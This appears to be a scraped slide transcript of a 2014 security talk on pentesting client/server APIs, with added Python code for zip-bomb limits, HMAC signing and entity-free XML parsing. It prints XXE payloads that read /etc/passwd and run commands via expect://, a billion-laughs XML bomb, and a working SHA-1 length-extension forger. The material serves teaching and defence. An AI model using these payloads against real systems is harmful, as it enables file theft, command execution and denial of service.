Pentesting client/server API
Sergey Belov
$ whoami
© 2002—2014, Digital Security 2
• Senior Security Auditor at Digital Security
• BugHunter: Google, Yandex, Badoo, Yahoo +++
• Writer: habrahabr, Xakep magazine
• CTF: DEFCON 2012 CTF Final, Chaos Construction CTF’2013
• Speaker: CodeFest 2012, ZeroNights 0x03
• Trainer: Hack in Paris’2014, BlackHat’2014 USA (soon)
What are we talking about?
API
Hacking via API
From interface to API methods
What should we test?
• Logic!
• Bypassing restrictions (sqli/xss)
• Parameter tampering
Developing
• Stop using hacks and custom implementations in the API! Really.
ZIP
42 Kb…
…10 Gb?
…100 Gb?
…100 Tb?
…4.5 Pb! http://www.unforgettable.dk/
Say HELLO to ZIP BOMB!
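An added defensive check for the scenario above (example code, not from the talk): read the sizes declared in the central directory before inflating anything, reject implausible expansion ratios, and cap the real output while streaming, because the declared sizes themselves can be forged. The 50 MiB budget, the 100:1 ratio and the sample archives are constructed assumptions.

```python
import io
import os
import zipfile

# Policy values are assumptions for this example, not numbers from the talk.
MAX_TOTAL_UNCOMPRESSED = 50 * 1024 * 1024   # 50 MiB decompression budget per upload
MAX_RATIO = 100                              # anything claiming more than 100:1 is suspect


class ZipBombSuspected(Exception):
    pass


def inspect_zip(data: bytes, max_total: int = MAX_TOTAL_UNCOMPRESSED,
                max_ratio: int = MAX_RATIO):
    """Look at the central directory only; nothing is decompressed here.
    Returns (member_count, declared_total_uncompressed) or raises ZipBombSuspected."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        infos = zf.infolist()
        total = 0
        for info in infos:
            total += info.file_size
            if info.compress_size and info.file_size / info.compress_size > max_ratio:
                raise ZipBombSuspected(
                    f"{info.filename}: declared ratio {info.file_size // info.compress_size}:1")
            if total > max_total:
                raise ZipBombSuspected(f"declared total {total} B exceeds budget {max_total} B")
        return len(infos), total


def extract_member_limited(data: bytes, name: str, max_bytes: int) -> bytes:
    """Stream-decompress one member and abort once the real output passes max_bytes.
    Header sizes can lie, so this cap is enforced on what actually comes out."""
    out = io.BytesIO()
    with zipfile.ZipFile(io.BytesIO(data)) as zf, zf.open(name) as member:
        while True:
            chunk = member.read(64 * 1024)
            if not chunk:
                break
            if out.tell() + len(chunk) > max_bytes:
                raise ZipBombSuspected(f"{name}: output exceeded {max_bytes} B while inflating")
            out.write(chunk)
    return out.getvalue()


def build_zip(payload: bytes, name: str = "report.txt") -> bytes:
    """Constructed sample archive with a single deflated member."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr(name, payload)
    return buf.getvalue()


# 4 MiB of zeros deflates at roughly 1000:1, the same property a zip bomb relies on.
BOMB_LIKE_ZIP = build_zip(b"\x00" * (4 * 1024 * 1024))
BENIGN_PAYLOAD = os.urandom(20_000)          # incompressible, so its ratio stays near 1:1
BENIGN_ZIP = build_zip(BENIGN_PAYLOAD)

if __name__ == "__main__":
    print("benign:", inspect_zip(BENIGN_ZIP))
    try:
        inspect_zip(BOMB_LIKE_ZIP)
    except ZipBombSuspected as exc:
        print("rejected:", exc)
```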
The evil of JavaScript
and
http://habrahabr.ru/post/186160/
Crypto
Query signing
Sign = sha*(…+DATA+…)
APIkey
But why?
Say hello again: to the length extension attack
A=1&B=2&C=3
07ce36c769ae130708258fb5dfa3d37ca5a67514
TOKEN=sha1(KEY+DATA)
Someone has hijacked just one request…
What does the attacker know?
• Original data
• Sign (token)
What does the attacker want?
Change some data / change params
A=1&B=2&C=3\x80\x00\x00…\x02&C=4
Can sign a new query without the API key!
Vkontakte: sig = md5(name1=value1name2=value2api_secret)
Mail.RU sig = md5(uid + params + private_key)
http://www.vnsecurity.net/2010/03/codegate_challenge15_sha1_padding_attack
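A worked version of the slides' TOKEN = sha1(KEY + DATA) scheme, as an added example that is not the talk's code: it re-implements the SHA-1 compression function so the hash can be resumed from a captured token, confirms that the weak scheme accepts the extended query (original data, glue padding, then "&C=4") without the key, and that HMAC-SHA1 over the same input does not. API_KEY, SIGNED_QUERY and APPENDED are constructed sample values.

```python
import hashlib
import hmac
import struct

# Constructed sample values, not from the talk.
API_KEY = b"secret_api_key"      # server-side secret the attacker never sees
SIGNED_QUERY = b"A=1&B=2&C=3"    # one captured, validly signed request
APPENDED = b"&C=4"               # data to tack on; many query parsers let the last value win


def sha1_padding(msg_len: int) -> bytes:
    """Merkle-Damgard padding SHA-1 appends: 0x80, zeros, 64-bit big-endian bit length."""
    return b"\x80" + b"\x00" * ((55 - msg_len) % 64) + struct.pack(">Q", msg_len * 8)


def _rotl(x: int, n: int) -> int:
    return ((x << n) | (x >> (32 - n))) & 0xFFFFFFFF


def _sha1_compress(state, block):
    """One SHA-1 compression over a 64-byte block (FIPS 180-1)."""
    w = list(struct.unpack(">16I", block))
    for i in range(16, 80):
        w.append(_rotl(w[i - 3] ^ w[i - 8] ^ w[i - 14] ^ w[i - 16], 1))
    a, b, c, d, e = state
    for i in range(80):
        if i < 20:
            f, k = (b & c) | (~b & d), 0x5A827999
        elif i < 40:
            f, k = b ^ c ^ d, 0x6ED9EBA1
        elif i < 60:
            f, k = (b & c) | (b & d) | (c & d), 0x8F1BBCDC
        else:
            f, k = b ^ c ^ d, 0xCA62C1D6
        a, b, c, d, e = (_rotl(a, 5) + f + e + k + w[i]) & 0xFFFFFFFF, a, _rotl(b, 30), c, d
    return tuple((s + v) & 0xFFFFFFFF for s, v in zip(state, (a, b, c, d, e)))


def sha1_resume(state, data: bytes, already_absorbed: int) -> str:
    """Continue SHA-1 from a chaining state as if `already_absorbed` bytes were hashed before."""
    padded = data + sha1_padding(already_absorbed + len(data))
    for i in range(0, len(padded), 64):
        state = _sha1_compress(state, padded[i:i + 64])
    return struct.pack(">5I", *state).hex()


SHA1_IV = (0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476, 0xC3D2E1F0)


def sha1_hex(data: bytes) -> str:
    """Plain SHA-1, used to check the implementation against hashlib."""
    return sha1_resume(SHA1_IV, data, 0)


def weak_sign(key: bytes, data: bytes) -> str:
    """The scheme from the slides: sha1(KEY + DATA). The digest IS the internal state."""
    return hashlib.sha1(key + data).hexdigest()


def hmac_sign(key: bytes, data: bytes) -> str:
    """The fix: HMAC hashes twice with the key, so the token leaks no resumable state."""
    return hmac.new(key, data, hashlib.sha1).hexdigest()


def verify(sign_fn, key: bytes, data: bytes, token: str) -> bool:
    return hmac.compare_digest(sign_fn(key, data), token)


def extend(token_hex: str, data: bytes, key_len: int, suffix: bytes):
    """Length extension: given sha1(KEY + DATA) and only len(KEY), build
    DATA + padding + suffix and a matching sha1(KEY + that) without the key."""
    state = struct.unpack(">5I", bytes.fromhex(token_hex))
    glue = sha1_padding(key_len + len(data))          # the \x80\x00...\x.. bytes on the slide
    forged = data + glue + suffix
    forged_token = sha1_resume(state, suffix, key_len + len(data) + len(glue))
    return forged, forged_token


def demo() -> dict:
    """Does each scheme accept the extended query? Expected: weak yes, HMAC no."""
    results = {}
    for name, sign_fn in (("sha1(KEY+DATA)", weak_sign), ("HMAC-SHA1", hmac_sign)):
        token = sign_fn(API_KEY, SIGNED_QUERY)
        forged, forged_token = extend(token, SIGNED_QUERY, len(API_KEY), APPENDED)
        results[name] = verify(sign_fn, API_KEY, forged, forged_token)
    return results


if __name__ == "__main__":
    print(demo())
```

Only the key length is needed, and that is usually guessable by trying a handful of lengths; the defence is HMAC (or any keyed MAC), not a longer secret.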
Request hijacking… How?
XML? XML entities!
DTD Example:
<!ENTITY writer "Donald Duck.">
<!ENTITY copyright "Copyright W3Schools.">
XML example:
<author>&writer;&copyright;</author>
XML entities?
External Entity!
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<foo>&xxe;</foo>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "expect://id" >]>
<foo>&xxe;</foo>
XML Bombs!
<?xml version="1.0"?>
<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ELEMENT lolz (#PCDATA)>
<!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
<!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
<!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
<!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
<!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
<!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>
<lolz>&lol9;</lolz>
Man in the Middle
Examples?
2013-11-19 by Reginaldo Silva
https://www.facebook.com/BugBounty/posts/778897822124446
http://www.ubercomp.com/posts/2014-01-16_facebook_remote_code_execution
Testing:
• https://www.owasp.org/index.php/Testing_for_XML_Injection_(OWASP-DV-008)
• XXE to RCE https://gist.github.com/joernchen/3623896
Development:
• Disable entities
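An added defensive example, not the talk's code, for the "disable entities" advice and for the external-entity and XML-bomb payloads shown earlier: an expat parser that refuses any DOCTYPE, entity declaration or external entity reference before expansion can start, so neither the file read nor the exponential expansion ever happens. The sample documents are constructed from the payload shapes on the slides.

```python
import xml.parsers.expat as expat


class UnsafeXML(ValueError):
    """Raised when untrusted XML tries to declare a DTD or entities."""


def parse_untrusted_xml(data: bytes) -> dict:
    """Parse XML from an API client with every entity mechanism switched off.
    Both payloads from the slides (SYSTEM entity, billion laughs) need a DOCTYPE,
    so rejecting the DTD up front stops them before any expansion or file access.
    Returns the root element name and its concatenated text."""
    parser = expat.ParserCreate()
    found = {"root": None, "text": []}

    def forbid(*args):
        # args[0] is the doctype name, entity name or entity context, depending on the hook
        raise UnsafeXML("DTD or entity declaration rejected: %r" % (args[0],))

    parser.StartDoctypeDeclHandler = forbid   # <!DOCTYPE ...>
    parser.EntityDeclHandler = forbid         # <!ENTITY ...>, internal or SYSTEM
    parser.ExternalEntityRefHandler = forbid  # any attempt to resolve an external entity

    def start(name, attrs):
        if found["root"] is None:
            found["root"] = name

    parser.StartElementHandler = start
    parser.CharacterDataHandler = found["text"].append
    parser.Parse(data, True)   # raises UnsafeXML (or ExpatError for malformed input)
    return {"root": found["root"], "text": "".join(found["text"])}


def is_safe_xml(data: bytes) -> bool:
    """True if the document parses without touching any DTD/entity feature."""
    try:
        parse_untrusted_xml(data)
        return True
    except UnsafeXML:
        return False


# Constructed samples: a harmless document and the two payload shapes from the talk.
HARMLESS = b"<author>Donald Duck</author>"
XXE = (b'<!DOCTYPE foo [<!ELEMENT foo ANY>'
       b'<!ENTITY xxe SYSTEM "file:///etc/passwd">]><foo>&xxe;</foo>')
BOMB = (b'<?xml version="1.0"?><!DOCTYPE lolz [<!ENTITY lol "lol">'
        b'<!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">'
        b'<!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">'
        b']><lolz>&lol2;</lolz>')

if __name__ == "__main__":
    print(parse_untrusted_xml(HARMLESS))
    for label, doc in (("xxe", XXE), ("bomb", BOMB)):
        print(label, "accepted" if is_safe_xml(doc) else "rejected")
```

Higher-level libraries (ElementTree, lxml, DOM parsers in other languages) need the equivalent switches set explicitly; the check here is the property to test for, not a substitute for reading each parser's entity settings.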
Finally:
• Re-test all interface restrictions;
• Specific compressions;
• JS callbacks;
• Crypto + SSL test + hardcoded credentials (hackapp.com);
• XML - XXE;
• Anything else :]
twitter.com/sergeybelove
sbelov@dsec.ru
Digital Security in Moscow: (495) 223-07-86
Digital Security in Saint Petersburg: (812) 703-15-47
Thanks for your attention!
Questions?
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptxLoriGlavin3
 
Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!Commit University
 
TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024Lonnie McRorey
 
Generative AI for Technical Writer or Information Developers
Generative AI for Technical Writer or Information DevelopersGenerative AI for Technical Writer or Information Developers
Generative AI for Technical Writer or Information DevelopersRaghuram Pandurangan
 
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)Mark Simos
 

Recently uploaded (20)

SAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptxSAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptx
 
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
 
Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 365Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 365
 
The Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and ConsThe Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and Cons
 
"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii Soldatenko"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii Soldatenko
 
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptxMerck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptx
 
Commit 2024 - Secret Management made easy
Commit 2024 - Secret Management made easyCommit 2024 - Secret Management made easy
Commit 2024 - Secret Management made easy
 
Developer Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQLDeveloper Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQL
 
From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .
 
Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?
 
Take control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test SuiteTake control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test Suite
 
Connect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationConnect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck Presentation
 
Unraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdfUnraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdf
 
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
 
Dev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebDev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio Web
 
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptx
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptxThe Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptx
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptx
 
Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!
 
TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024
 
Generative AI for Technical Writer or Information Developers
Generative AI for Technical Writer or Information DevelopersGenerative AI for Technical Writer or Information Developers
Generative AI for Technical Writer or Information Developers
 
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
 

CodeFest 2014 - Pentesting client/server API

2. $ whoami
© 2002—2014, Digital Security
• Senior Security Auditor at Digital Security
• BugHunter: Google, Yandex, Badoo, Yahoo +++
• Writer: habrahabr, Xakep magazine
• CTF: DEFCON 2012 CTF Final, Chaos Construction CTF’2013
• Speaker: CodeFest 2012, ZeroNights 0x03
• Trainer: Hack in Paris’2014, BlackHat’2014 USA (soon)

3–4. What are we talking about?
API

5–6. Hacking via API (no transcript text)

7. Hacking via API
From interface to API methods

8–11. Hacking via API (no transcript text)

12. Hacking via API
What should we test?
• Logic!
• Bypassing restrictions (sqli/xss)
• Parameter tampering
Developing
• Stop hacks and custom implementation in API! Really

13. Hacking via API (no transcript text)

14. Hacking via API
ZIP

15–19. Hacking via API
42 Kb…
…10 Gb?
…100 Gb?
…100 Tb?
…4.5 Pb! http://www.unforgettable.dk/

20. Hacking via API
Say HELLO to ZIP BOMB!
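The 42 Kb to 4.5 Pb sequence on slides 15–20 is the zip-bomb problem: an API that inflates uploads on the server pays for the uncompressed size, not the upload size. The following is an added example, not code from the talk, showing how an upload handler can put a hard budget on decompression. It uses only the Python standard library; the limits, the function names and the all-zero sample archive (`make_sample_zip`) are constructed for the demonstration. The central-directory sizes are attacker-controlled, so the metadata check is only a cheap first gate; the streaming byte count is the one that actually holds.

```python
import io
import zipfile


class ArchiveTooLarge(ValueError):
    """Raised when an archive would expand beyond the configured budget."""


def inspect_zip(data: bytes, max_total: int, max_ratio: int = 100) -> int:
    """Cheap first gate: check the sizes the central directory *claims*.

    Those header fields are written by whoever built the archive, so this only
    rejects the obvious cases early; safe_extract() enforces the real limit.
    Returns the declared uncompressed total.
    """
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        infos = [i for i in zf.infolist() if not i.is_dir()]
        declared = sum(i.file_size for i in infos)
        compressed = sum(i.compress_size for i in infos)
    if declared > max_total:
        raise ArchiveTooLarge(f"declares {declared} bytes, budget is {max_total}")
    if compressed and declared / compressed > max_ratio:
        raise ArchiveTooLarge(f"ratio {declared // compressed}:1 exceeds {max_ratio}:1")
    return declared


def safe_extract(data: bytes, max_total: int, max_ratio: int = 100,
                 chunk: int = 64 * 1024) -> dict:
    """Inflate every member in chunks, counting real output bytes as we go.

    Aborts as soon as the running total passes max_total, whatever the headers
    said. Returns {member name: bytes} for archives that stay within budget.
    """
    inspect_zip(data, max_total, max_ratio)
    extracted, total = {}, 0
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            buf = io.BytesIO()
            with zf.open(info) as member:
                while piece := member.read(chunk):
                    total += len(piece)
                    if total > max_total:
                        raise ArchiveTooLarge("output exceeded budget while inflating")
                    buf.write(piece)
            extracted[info.filename] = buf.getvalue()
    return extracted


def is_acceptable(data: bytes, max_total: int, max_ratio: int = 100) -> bool:
    """Boolean wrapper for an upload handler: True only if extraction stayed in budget."""
    try:
        safe_extract(data, max_total, max_ratio)
        return True
    except (ArchiveTooLarge, zipfile.BadZipFile):
        return False


def make_sample_zip(inner_size: int, name: str = "zeros.bin") -> bytes:
    """Constructed sample input: one deflate member of all-zero bytes, which
    compresses close to deflate's ~1000:1 ceiling (not a real-world bomb)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr(name, b"\0" * inner_size)
    return buf.getvalue()


if __name__ == "__main__":
    small = make_sample_zip(1024)
    big = make_sample_zip(4 << 20)
    print(is_acceptable(small, max_total=1 << 20, max_ratio=10_000))  # True
    print(is_acceptable(big, max_total=1 << 20, max_ratio=10_000))    # False: declares 4 MiB
    print(is_acceptable(big, max_total=8 << 20, max_ratio=100))       # False: ratio about 1000:1
```

Nested archives (a zip inside a zip) need the same budget applied recursively, with a depth limit; the streaming counter above is per call, so a recursive handler should pass one shared running total down.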
21. Hacking via API
The evil of JavaScript and

22–23. Hacking via API (no transcript text)

24. Hacking via API
http://habrahabr.ru/post/186160/

25. Hacking via API
Crypto

26. Hacking via API
Query signing
Sign = sha*(…+DATA+…)
APIkey

27. Hacking via API (no transcript text)

28. Hacking via API
But why?

29. Hacking via API
Say hello again. To length extension attack

30. Hacking via API
A=1&B=2&C=3
07ce36c769ae130708258fb5dfa3d37ca5a67514
TOKEN=sha1(KEY+DATA)

31. Hacking via API
Some have hijacked just 1 request…

32. Hacking via API
What does the attacker know?
• Original data
• Sign (token)

33. Hacking via API
What does the attacker want?
Change some data / change params

34. Hacking via API
A=1&B=2&C=3\x80\x00\x00…\x02&C=4

35. Hacking via API
Can sign new query without API key!
Vkontakte: sig = md5(name1=value1name2=value2api_secret)
Mail.RU: sig = md5(uid + params + private_key)
http://www.vnsecurity.net/2010/03/codegate_challenge15_sha1_padding_attack
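Slides 26–35 explain why TOKEN = sha1(KEY + DATA) is not a MAC: SHA-1, MD5 and SHA-256 are Merkle–Damgård hashes whose digest is the whole internal state, so a party holding one signed request can continue the hash with extra parameters without knowing the key. The following is an added example, not code from the talk, showing the hardened design an API should use instead: HMAC over a canonical serialisation of the parameters, constant-time comparison, and a timestamp plus nonce so that a captured request cannot simply be replayed. Only the Python standard library is used; `API_KEY`, the parameter names and the time window are constructed for the demonstration.

```python
import hashlib
import hmac
import secrets
import time
from urllib.parse import urlencode

# Constructed sample secret; a real deployment loads it from a key store.
API_KEY = b"example-api-secret-not-for-production"


def sign_concat(key: bytes, data: bytes) -> str:
    """The weak pattern from the slides, sha1(KEY + DATA), kept only as the
    'before': the digest is the hash state, so it can be extended with more
    data by anyone who knows the key length. Never use this for requests."""
    return hashlib.sha1(key + data).hexdigest()


def canonical(params: dict) -> bytes:
    """Deterministic serialisation of what the MAC covers: sorted keys and
    percent-encoding, so an '&' or '=' inside a value cannot be confused with
    a separator and client and server hash exactly the same bytes."""
    return urlencode(sorted(params.items())).encode("utf-8")


def sign_request(key: bytes, params: dict, now=None, nonce=None) -> dict:
    """Client side: add a timestamp and a random nonce, then HMAC-SHA256 the
    canonical form. HMAC keys the hash on both sides of the data, so the
    output is not a reusable hash state and cannot be extended."""
    signed = dict(params,
                  ts=str(int(time.time()) if now is None else now),
                  nonce=secrets.token_hex(8) if nonce is None else nonce)
    sig = hmac.new(key, canonical(signed), hashlib.sha256).hexdigest()
    return dict(signed, sig=sig)


def verify_request(key: bytes, request: dict, now=None,
                   max_skew: int = 300, seen_nonces=None) -> bool:
    """Server side: recompute the MAC over everything except 'sig', compare in
    constant time, then reject stale timestamps and repeated nonces."""
    req = dict(request)
    sig = req.pop("sig", None)
    if sig is None or "ts" not in req or "nonce" not in req:
        return False
    expected = hmac.new(key, canonical(req), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(expected, sig):
        return False                      # tampered, or signed with another key
    try:
        ts = int(req["ts"])
    except ValueError:
        return False
    if abs((int(time.time()) if now is None else now) - ts) > max_skew:
        return False                      # replay of an old capture
    if seen_nonces is not None:           # replay inside the time window
        if req["nonce"] in seen_nonces:
            return False
        seen_nonces.add(req["nonce"])
    return True


if __name__ == "__main__":
    req = sign_request(API_KEY, {"A": "1", "B": "2", "C": "3"})
    print(verify_request(API_KEY, req))             # True
    print(verify_request(API_KEY, dict(req, C="4")))  # False: C changed, MAC no longer matches
```

The nonce set must be shared by all API nodes (a cache with a TTL equal to `max_skew`) for the replay check to mean anything in a load-balanced deployment; the signature itself stays valid across nodes because only the key is needed to recompute it.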
36. Hacking via API
Request hijacking… How?

37–44. Hacking via API (no transcript text)

45. Hacking via API
XML? XML entities!

46. Hacking via API
DTD Example:
<!ENTITY writer "Donald Duck.">
<!ENTITY copyright "Copyright W3Schools.">
XML example:
<author>&writer;&copyright;</author>

47. Hacking via API
XML entities? External Entity!

48. Hacking via API
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<foo>&xxe;</foo>

49. Hacking via API
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "expect://id" >]>
<foo>&xxe;</foo>

50. Hacking via API
XML Bombs!

51. Hacking via API
<?xml version="1.0"?>
<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ELEMENT lolz (#PCDATA)>
<!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
<!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
<!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
<!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
<!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
<!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>
<lolz>&lol9;</lolz>

52. What are we talking about?
Man in the Middle

53. Hacking via API
Examples?

54. Hacking via API
2013-11-19 by Reginaldo Silva

55. Hacking via API
https://www.facebook.com/BugBounty/posts/778897822124446
http://www.ubercomp.com/posts/2014-01-16_facebook_remote_code_execution

56. Hacking via API
Testing:
• https://www.owasp.org/index.php/Testing_for_XML_Injection_(OWASP-DV-008)
• XXE to RCE https://gist.github.com/joernchen/3623896
Development:
• Disable entities
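Slide 56's development advice, "Disable entities", covers both the external-entity documents on slides 48–49 and the entity-expansion bomb on slide 51, because both depend on a DTD declaring entities. The following is an added example, not code from the talk, of an API handler that refuses any document declaring or referencing an entity before the parser ever expands one. It uses only the Python standard library (`xml.parsers.expat` and `xml.etree.ElementTree`); the usual production choice is the `defusedxml` package, which applies the same idea. The function names, the size limit and the sample documents are constructed for the demonstration; the bomb sample is the slide's "lolz" document cut down to three levels.

```python
import xml.etree.ElementTree as ET
import xml.parsers.expat as expat


class UnsafeXMLError(ValueError):
    """Raised for any document that declares or references an entity."""


def _reject_entity_decl(name, is_parameter_entity, value, base,
                        system_id, public_id, notation_name):
    # expat calls this for every <!ENTITY ...> in the DTD, before the entity
    # is expanded anywhere. Raising here aborts the parse immediately, so a
    # billion-laughs document never gets past its first declaration.
    raise UnsafeXMLError(f"entity declaration rejected: {name!r}")


def _reject_external_ref(context, base, system_id, public_id):
    # Defence in depth: never resolve file://, http://, expect:// and friends.
    raise UnsafeXMLError(f"external entity reference rejected: {system_id!r}")


def check_no_entities(document: str, max_bytes: int = 1 << 20) -> None:
    """Walk the document once with expat, aborting on the first entity
    declaration or external reference. Raises UnsafeXMLError for policy
    violations and expat.ExpatError for malformed input."""
    if len(document.encode("utf-8")) > max_bytes:
        raise UnsafeXMLError("document exceeds size limit")
    parser = expat.ParserCreate()
    parser.EntityDeclHandler = _reject_entity_decl
    parser.ExternalEntityRefHandler = _reject_external_ref
    parser.Parse(document, True)


def parse_api_xml(document: str) -> ET.Element:
    """Entry point for a request handler: gate first, then parse normally."""
    check_no_entities(document)
    return ET.fromstring(document)


def is_safe_xml(document: str) -> bool:
    """True only for well-formed documents with no entity declarations."""
    try:
        check_no_entities(document)
        return True
    except (UnsafeXMLError, expat.ExpatError):
        return False


# Constructed sample inputs: the XXE document from slide 48, a shortened
# version of the slide 51 bomb, and an ordinary request body.
XXE_DOC = """<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<foo>&xxe;</foo>"""

BOMB_DOC = """<?xml version="1.0"?>
<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ELEMENT lolz (#PCDATA)>
<!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
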